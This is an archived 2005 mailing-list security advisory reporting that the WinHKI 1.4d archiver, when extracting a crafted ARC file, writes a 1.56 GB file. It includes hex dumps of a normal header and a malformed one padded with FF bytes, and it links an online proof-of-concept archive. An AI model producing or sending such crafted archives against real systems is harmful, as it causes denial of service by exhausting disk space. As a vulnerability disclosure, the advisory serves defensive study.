lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Fri, 07 Jan 2005 01:17:03 +0200
From: "Rafel Ivgi, The-Insider" <theinsider@....net.il>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com,
 Windows NTBugtraq Mailing List <NTBUGTRAQ@...TSERV.NTBUGTRAQ.COM>,
 vulnwatch@...nwatch.org, news@...uriteam.com,
 "securitytracker.com" <bugs@...uritytracker.com>
Subject: WinHKI - ARC File Extraction of 1KB to 1.56GB


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:    WinHKI
Vendors:        http://www.webtoolmaster.com
Versions:       1.4d
Platforms:      Windows
Bug:            ARC File Extraction of 1KB to 1.56GB
Exploitation:   Local (extract file)
Date:           24 Dec 2004
Author:         Rafel Ivgi, The-Insider
E-Mail:         the_insider@...l.com
Website:        http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

WinHKI is a file archiever which supports: ARC, BH, CAB, HKI, JAR, LHA,TAR,

GZ compressions.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

This is a normal CAB compressed file header

00000000 1A02 3235 312E 4854 4D00 5E5E 5E5E 5E1B ..251.HTM.^^^^^.
00000010 0000 0078 3139 73B5 121B 0000 003C 7363 ...x19s......<sc
00000020 7269 7074 FB3E 616C 6572 7428 293C 2F73 ript.>alert()</s
00000030 6372 6970 743E 0D0A 1A00                cript>....

By adding after the filename header a certain amount of chars
and replacing all nulls (00) with FF (in order to avoid our
long string from being terminated)

00000000 1A02 3235 312E 4854 4DFF 5E5E 5E5E 5EFF ..251.HTM.^^^^^.
00000010 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000020 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000030 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000040 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000050 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000060 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000070 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000080 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000090 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000000A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000000B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000000C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000000D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000000E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000000F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000100 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000110 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000120 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000130 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000140 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000150 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000160 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000170 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000180 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000190 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000001A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000001B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000001C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000001D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000001E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000001F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000200 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000210 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000220 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000230 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000240 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000250 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000260 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000270 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000280 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000290 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000002A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000002B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000002C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000002D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000002E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000002F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000300 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000310 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000320 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000330 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000340 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000350 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000360 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000370 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000380 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000390 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000003A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000003B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000003C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000003D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000003E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000003F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000400 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FF1B ................
00000410 FFFF FF78 3139 73B5 121B FFFF FF3C 7363 ...x19s......<sc
00000420 7269 7074 FB3E 616C 6572 7428 293C 2F73 ript.>alert()</s
00000430 6372 6970 743E 0D0A 1A00                cript>....


HKI will create a 1.56 GIGA BYTE file on at the selected extract location.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

An online proof of concept can be found at:
http://theinsider.deep-ice.com/hki156gb.ARC

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Scripts and Codes will make me D.O.S , but they will never HACK me."

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ